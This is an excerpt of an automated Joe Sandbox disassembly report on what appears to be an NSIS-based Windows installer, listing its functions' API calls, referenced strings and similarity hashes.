                                        • Snapshot File: hcaresult_7_2_400000_9CFE.jbxd
                                        Similarity
                                        • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                        • String ID: @%F$N$open
                                        • API String ID: 3928313111-3849437375
                                        • Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                        • Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
                                        • Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                        • Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99
                                        APIs
                                        • lstrcpyW.KERNEL32(0045B2C8,NUL), ref: 00406AA9
                                        • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
                                        • GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1
                                          • Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                          • Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                        • GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
                                        • wsprintfA.USER32 ref: 00406B4D
                                        • GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
                                        • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
                                        • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37
                                          • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                          • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                        • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
                                        • GlobalFree.KERNEL32(00000000), ref: 00406C52
                                        • CloseHandle.KERNEL32(?), ref: 00406C5C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_9CFE.jbxd
                                        Similarity
                                        • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                        • String ID: F$%s=%s$NUL$[Rename]
                                        • API String ID: 565278875-1653569448
                                        • Opcode ID: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                        • Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
                                        • Opcode Fuzzy Hash: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                        • Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC
                                        APIs
                                        • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                        • BeginPaint.USER32(?,?), ref: 00401047
                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                        • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                        • DeleteObject.GDI32(?), ref: 004010F6
                                        • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                        • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                        • SelectObject.GDI32(00000000,?), ref: 00401149
                                        • DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
                                        • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                        • DeleteObject.GDI32(?), ref: 0040116E
                                        • EndPaint.USER32(?,?), ref: 00401177
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_9CFE.jbxd
                                        Similarity
                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                        • String ID: F
                                        • API String ID: 941294808-1304234792
                                        • Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                        • Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
                                        • Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                        • Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4
                                        APIs
                                        • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                        • lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                        • RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                        • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                        Strings
                                        • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                        • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                        • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                        • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                        • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                        • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_9CFE.jbxd
                                        Similarity
                                        • API ID: lstrlen$CloseCreateValuewvsprintf
                                        • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                        • API String ID: 1641139501-220328614
                                        • Opcode ID: d79db666ee92a39b53e47641609ed565b43369f8775619f718224e07aa5483b4
                                        • Instruction ID: 4ea7a0066738be70411365ddd6f3e5606018e51d84950e7919a1ab5782edcef9
                                        • Opcode Fuzzy Hash: d79db666ee92a39b53e47641609ed565b43369f8775619f718224e07aa5483b4
                                        • Instruction Fuzzy Hash: 3D41BFB2D00209BFDF11AF90CE46DAEBBB9EB04704F20407BF505B61A1D6B94B509B59
                                        APIs
                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                        • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                        • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                        • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                        • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                        • DeleteFileW.KERNEL32(?), ref: 00402F56
                                        Strings
                                        • created uninstaller: %d, "%s", xrefs: 00402F3B
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_9CFE.jbxd
                                        Similarity
                                        • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                        • String ID: created uninstaller: %d, "%s"
                                        • API String ID: 3294113728-3145124454
                                        • Opcode ID: c666975226392a23a96cc8c7abb3eb5c8f7508c76e04a15e1ccd320165ca38cb
                                        • Instruction ID: 876417c632a2c352b67fb01c84f3ccb8dada3a759dccfb7ac575e016526b3130
                                        • Opcode Fuzzy Hash: c666975226392a23a96cc8c7abb3eb5c8f7508c76e04a15e1ccd320165ca38cb
                                        • Instruction Fuzzy Hash: E231B272800115BBCB11AFA4CE45DAF7FB9EF08364F10023AF555B61E1CB794E419B98
                                        APIs
                                        • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                        • GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
                                        • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
                                        • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678), ref: 0040619B
                                        • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
                                        • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_9CFE.jbxd
                                        Similarity
                                        • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                        • String ID: RMDir: RemoveDirectory invalid input("")
                                        • API String ID: 3734993849-2769509956
                                        • Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                        • Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
                                        • Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                        • Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD
                                        APIs
                                        • GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
                                        • GetSysColor.USER32(00000000), ref: 00403E00
                                        • SetTextColor.GDI32(?,00000000), ref: 00403E0C
                                        • SetBkMode.GDI32(?,?), ref: 00403E18
                                        • GetSysColor.USER32(?), ref: 00403E2B
                                        • SetBkColor.GDI32(?,?), ref: 00403E3B
                                        • DeleteObject.GDI32(?), ref: 00403E55
                                        • CreateBrushIndirect.GDI32(?), ref: 00403E5F
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_9CFE.jbxd
                                        Similarity
                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                        • String ID:
                                        • API String ID: 2320649405-0
                                        • Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                        • Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
                                        • Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                        • Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                          • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
                                          • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                        • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                        • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                        Strings
                                        • Error registering DLL: Could not load %s, xrefs: 004024DB
                                        • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                        • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_9CFE.jbxd
                                        Similarity
                                        • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                        • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
                                        • API String ID: 1033533793-945480824
                                        • Opcode ID: aebbfb54fe117075fb91935afd2b3d42be9cb3525beaf419298f1839c78bdf39
                                        • Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
                                        • Opcode Fuzzy Hash: aebbfb54fe117075fb91935afd2b3d42be9cb3525beaf419298f1839c78bdf39
                                        • Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D
                                        APIs
                                        • lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                        • lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                        • lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
                                        • SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                        • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                        • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                          • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_9CFE.jbxd
                                        Similarity
                                        • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                        • String ID:
                                        • API String ID: 2740478559-0
                                        • Opcode ID: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                        • Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
                                        • Opcode Fuzzy Hash: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                        • Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98
                                        APIs
                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                          • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
                                          • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                          • Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                          • Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71
                                        • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                        • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                        Strings
                                        • Exec: success ("%s"), xrefs: 00402263
                                        • Exec: command="%s", xrefs: 00402241
                                        • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_9CFE.jbxd
                                        Similarity
                                        • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                        • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                        • API String ID: 2014279497-3433828417
                                        • Opcode ID: 04fd410bbb31de0d7d21d8cf733f8caec58fdd5b228a354368cf1c704b35d166
                                        • Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
                                        • Opcode Fuzzy Hash: 04fd410bbb31de0d7d21d8cf733f8caec58fdd5b228a354368cf1c704b35d166
                                        • Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D
                                        APIs
                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
                                        • GetMessagePos.USER32 ref: 00404871
                                        • ScreenToClient.USER32(?,?), ref: 00404889
                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
                                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_9CFE.jbxd
                                        Similarity
                                        • API ID: Message$Send$ClientScreen
                                        • String ID: f
                                        • API String ID: 41195575-1993550816
                                        • Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                        • Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
                                        • Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                        • Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5
                                        APIs
                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                        • MulDiv.KERNEL32(00011400,00000064,?), ref: 00403295
                                        • wsprintfW.USER32 ref: 004032A5
                                        • SetWindowTextW.USER32(?,?), ref: 004032B5
                                        • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                        Strings
                                        • verifying installer: %d%%, xrefs: 0040329F
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_9CFE.jbxd
                                        Similarity
                                        • API ID: Text$ItemTimerWindowwsprintf
                                        • String ID: verifying installer: %d%%
                                        • API String ID: 1451636040-82062127
                                        • Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                        • Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
                                        • Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                        • Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58
                                        APIs
                                        • lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
                                        • wsprintfW.USER32 ref: 00404457
                                        • SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
